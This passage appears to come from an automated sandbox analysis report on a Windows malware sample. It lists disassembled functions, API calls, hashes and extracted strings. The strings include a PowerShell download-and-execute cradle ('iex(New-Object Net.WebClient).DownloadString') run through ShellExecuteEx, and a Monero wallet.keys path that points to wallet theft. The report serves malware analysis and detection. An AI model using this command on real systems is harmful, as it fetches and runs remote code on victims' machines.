                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: 6bd2454cd91e71745834770d14c05a7739a8061b25ea5da2ea7b25e9685ad7b1
                          • Instruction ID: 917364238f3c4f99cafae1a2679d49ade54b1f4138dbc749ce9fe54ff895cede
                          • Opcode Fuzzy Hash: 6bd2454cd91e71745834770d14c05a7739a8061b25ea5da2ea7b25e9685ad7b1
                          • Instruction Fuzzy Hash: 2E3173B294020967DB10FBB0DC99EE9777CBB88701F40458AB715A6081EE7897CD8FA5
                          Function 00552C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00552D85
                          Strings
                          • <, xrefs: 00552D39
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00552CC4
                          • ')", xrefs: 00552CB3
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00552D04
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: 6ff91c324b68020fbcc8230351c50ce9e8198a4d0c4ac3470f06ba216abb055b
                          • Instruction ID: 24d1e7c0bf4614fac62893615a8166f8a75fdf57b89dc96d87fe0197a2e9524a
                          • Opcode Fuzzy Hash: 6ff91c324b68020fbcc8230351c50ce9e8198a4d0c4ac3470f06ba216abb055b
                          • Instruction Fuzzy Hash: 2D41B171C102099ADB14EFA0C8A6BEDBF78BF54301F50421AF916A7191EF746A4ECF91
                          Function 00549E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00549F41
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: 1e3035051724565a3344e842acfe1305daffd509f9f779bbba526b2ebba82752
                          • Instruction ID: d8d240c530a86402c7ba46dfad72902b8472c72df92b125ef9691fc6f89524f6
                          • Opcode Fuzzy Hash: 1e3035051724565a3344e842acfe1305daffd509f9f779bbba526b2ebba82752
                          • Instruction Fuzzy Hash: 3D613270A10249DBDB14EFA4CCAAFEE7B75BF84344F008518F90A5F191EB746A49CB52
                          Function 005570D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          • memset.MSVCRT ref: 0055716A
                          Strings
                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0055718C
                          • sU, xrefs: 00557111
                          • sU, xrefs: 005572AE, 00557179, 0055717C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpymemset
                          • String ID: sU$sU$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                          • API String ID: 4047604823-2944379081
                          • Opcode ID: a380d7f737c15f5b544a236192c5da77c12c2a714c0f559c92d6e9fe147f732a
                          • Instruction ID: 333499b0331cf4410ae5a3f2dfd7a565c0f087d1c4ffc189d71b099ab73b8786
                          • Opcode Fuzzy Hash: a380d7f737c15f5b544a236192c5da77c12c2a714c0f559c92d6e9fe147f732a
                          • Instruction Fuzzy Hash: 02517EB0C0420D9BDB14EB90DCA9BEEBB74BF58305F50419AE91577181EB742A8CCF54
                          Function 00557E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00557E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,0122BD10,00000000,00020119,?), ref: 00557E5E
                          • RegQueryValueExA.ADVAPI32(?,0123E4A8,00000000,00000000,000000FF,000000FF), ref: 00557E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00557E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: ea9875ee0aac64b87c809c110d8b61b7b89ac13a2c635eeb5e030f3313882078
                          • Instruction ID: 56efb76b2cf95b8240b611862324fabffb5c27db4d9d664421e8e5140a368cad
                          • Opcode Fuzzy Hash: ea9875ee0aac64b87c809c110d8b61b7b89ac13a2c635eeb5e030f3313882078
                          • Instruction Fuzzy Hash: 481130B1A44209BBE710CF94DD5AF6BBBBCFB08711F20815AFA05A7280D77858048BA1
                          Function 00559260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                          Download Yara Rule
                          APIs
                          • StrStrA.SHLWAPI(0123F1E8,?,?,?,0055140C,?,0123F1E8,00000000), ref: 0055926C
                          • lstrcpyn.KERNEL32(0078AB88,0123F1E8,0123F1E8,?,0055140C,?,0123F1E8), ref: 00559290
                          • lstrlen.KERNEL32(?,?,0055140C,?,0123F1E8), ref: 005592A7
                          • wsprintfA.USER32 ref: 005592C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: 9f7940edcf45aaec21ec8089b50fafa8c05c5bccacee08966612f887eaaea519
                          • Instruction ID: 500163c78d6353240f4ecee5eca953ff5661c5dbbb00720c7d4a87e4dac5f2b1
                          • Opcode Fuzzy Hash: 9f7940edcf45aaec21ec8089b50fafa8c05c5bccacee08966612f887eaaea519
                          • Instruction Fuzzy Hash: D0011EB5540208FFDB04DFECC994EAE7BB9FB44351F108559F9098B204C639EA40DB95
                          Function 005412A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005412B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 005412BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005412D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005412F5
                          • RegCloseKey.ADVAPI32(?), ref: 005412FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 0ec7eea1b13991060d52ec5011131c44e89d319206e36b727f7f310a1b5b2fe7
                          • Instruction ID: 64496cd3bf276e75d5650731245ab0fb3b43d498094a3344207a8784ed2141fb
                          • Opcode Fuzzy Hash: 0ec7eea1b13991060d52ec5011131c44e89d319206e36b727f7f310a1b5b2fe7
                          • Instruction Fuzzy Hash: 4D0136B9A40208BBEB00DFE0DC49FAEB7B8EB48701F108155FA05D7280D6749A019F55
                          Function 00556630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00556663
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00556726
                          • ExitProcess.KERNEL32 ref: 00556755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: bd9e8f6393f17b99cd10519670dff27aa2f3dec5de4685aae1da7e9307b98591
                          • Instruction ID: 76d0334e3cb9ae8ef9df826022545192d81595670c63ba0d09d7774564a70188
                          • Opcode Fuzzy Hash: bd9e8f6393f17b99cd10519670dff27aa2f3dec5de4685aae1da7e9307b98591
                          • Instruction Fuzzy Hash: 82312FB1801219ABDB14EB50DCA5FDD7B78BF84301F40418AF61976191DF746B48CF6A
                          Function 005587C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00560E28,00000000,?), ref: 0055882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00558836
                          • wsprintfA.USER32 ref: 00558850
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: 0e252984dd6d77bbbfbb8d926a5186856423be9433bbf97c6958831450a9ffc9
                          • Instruction ID: f27ffd1b6372606241725577f9286628833b3f6ade8cf7fff71a170a96260dd7
                          • Opcode Fuzzy Hash: 0e252984dd6d77bbbfbb8d926a5186856423be9433bbf97c6958831450a9ffc9
                          • Instruction Fuzzy Hash: 632103B1A40204BFEB04DFD4DD49FAEBBB8FB48711F20851AF605A7290D77D99018BA5
                          Function 00558D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0055951E,00000000), ref: 00558D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00558D62
                          • wsprintfW.USER32 ref: 00558D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: b6e4b7bf5d711e34fed9c634af68a8ee0d2c3c33e38d54bcf60a15649016f6b9
                          • Instruction ID: 8931413a5d93e79e9bf228168f7fb1994a05517786c729212b24a77a023167f5
                          • Opcode Fuzzy Hash: b6e4b7bf5d711e34fed9c634af68a8ee0d2c3c33e38d54bcf60a15649016f6b9
                          • Instruction Fuzzy Hash: FCE0E675A80208BBD710DB94DD09E5977B8EB44711F104155FE0997280D9755E109B66
                          Function 0054A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0123ED70,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054A2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 0054A3FF
                          • lstrlen.KERNEL32(00000000), ref: 0054A6BC
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 0054A743
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
